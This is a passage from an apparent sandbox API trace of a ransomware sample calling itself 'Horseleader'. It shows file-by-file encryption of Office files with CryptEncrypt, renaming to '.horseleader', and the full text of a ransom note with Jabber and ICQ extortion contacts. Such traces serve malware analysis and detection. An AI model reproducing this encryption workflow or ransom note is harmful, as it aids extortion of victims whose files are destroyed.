nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.958] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.968] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.968] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x61, lpOverlapped=0x0) returned 1 [0244.968] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.969] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x61, lpOverlapped=0x0) returned 1 [0244.969] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.969] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.969] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.969] CloseHandle (hObject=0x15c) returned 1 [0244.970] GetProcessHeap () returned 0x780000 [0244.970] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) 
returned 0x7e2960 [0244.970] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.horseleader") returned 112 [0244.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.horseleader")) returned 1 [0244.971] GetProcessHeap () returned 0x780000 [0244.971] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.971] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x468a2b70, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x83258520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisiorWW.XML", cAlternateFileName="")) returned 1 [0244.971] lstrcmpiW (lpString1="VisiorWW.XML", lpString2="Windows") returned -1 [0244.971] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 103 [0244.971] StrStrIW (lpFirst="VisiorWW.XML", lpSrch=".horseleader") returned 0x0 [0244.971] lstrcmpW (lpString1="VisiorWW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.971] lstrcmpW (lpString1="VisiorWW.XML", 
lpString2="_uninstalling_.png") returned 1 [0244.971] lstrlenW (lpString=".testttjffg") returned 11 [0244.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML", lpSrch=".testttjffg") returned 0x0 [0244.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.972] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 103 [0244.972] StrStrW (lpFirst="VisiorWW.XML", lpSrch=".txt") returned 0x0 [0244.972] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=8723) returned 1 [0244.973] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2213, lpOverlapped=0x0) returned 1 [0244.975] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.975] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2213, 
lpOverlapped=0x0) returned 1 [0244.976] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.976] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.976] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.976] CloseHandle (hObject=0x15c) returned 1 [0244.976] GetProcessHeap () returned 0x780000 [0244.976] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.977] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.horseleader") returned 115 [0244.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.horseleader")) returned 1 [0244.978] GetProcessHeap () returned 0x780000 [0244.978] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.978] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x468a2b70, ftCreationTime.dwHighDateTime=0x1d305eb, 
ftLastAccessTime.dwLowDateTime=0x83258520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisiorWW.XML", cAlternateFileName="")) returned 0 [0244.978] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.978] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\#Decrypt#.txt") returned 104 [0244.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.981] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.981] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.982] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.982] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.982] CloseHandle (hObject=0x1a4) returned 1 [0244.983] 
GetProcessHeap () returned 0x780000 [0244.983] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.983] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Word.en-us", cAlternateFileName="WORD~1.EN-")) returned 1 [0244.983] lstrcmpiW (lpString1="Word.en-us", lpString2="Windows") returned 1 [0244.983] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us") returned 94 [0244.983] lstrcmpW (lpString1="Word.en-us", lpString2=".") returned 1 [0244.983] lstrcmpW (lpString1="Word.en-us", lpString2="..") returned 1 [0244.983] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.983] GetProcessHeap () returned 0x780000 [0244.983] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.983] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*") returned 96 [0244.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, 
ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.985] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.985] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\.") returned 96 [0244.985] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.985] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="..", cAlternateFileName="")) returned 1 [0244.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.985] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\..") returned 97 [0244.985] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.985] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.985] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe076d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 
nFileSizeLow=0x978, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.986] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.986] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 104 [0244.986] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.986] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.986] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.986] lstrlenW (lpString=".testttjffg") returned 11 [0244.986] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.986] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.986] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.988] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 104 [0244.988] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.988] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2424) 
returned 1 [0244.988] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x978, lpOverlapped=0x0) returned 1 [0244.990] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff688, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.990] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x978, lpOverlapped=0x0) returned 1 [0244.990] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.990] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.990] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.991] CloseHandle (hObject=0x15c) returned 1 [0244.991] GetProcessHeap () returned 0x780000 [0244.991] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.991] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.horseleader") returned 116 [0244.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.horseleader")) returned 1 [0244.992] GetProcessHeap () returned 0x780000 [0244.992] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.992] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="WordMUI.XML", cAlternateFileName="")) returned 1 [0244.992] lstrcmpiW (lpString1="WordMUI.XML", lpString2="Windows") returned 1 [0244.992] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 106 [0244.992] StrStrIW (lpFirst="WordMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.992] lstrcmpW (lpString1="WordMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.992] lstrcmpW (lpString1="WordMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.992] lstrlenW (lpString=".testttjffg") returned 11 [0244.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.993] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 106 [0244.993] StrStrW (lpFirst="WordMUI.XML", lpSrch=".txt") returned 0x0 [0244.994] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1800) returned 1 [0244.994] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x708, lpOverlapped=0x0) returned 1 [0244.999] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.999] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x708, lpOverlapped=0x0) returned 1 [0244.999] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.999] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.000] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | 
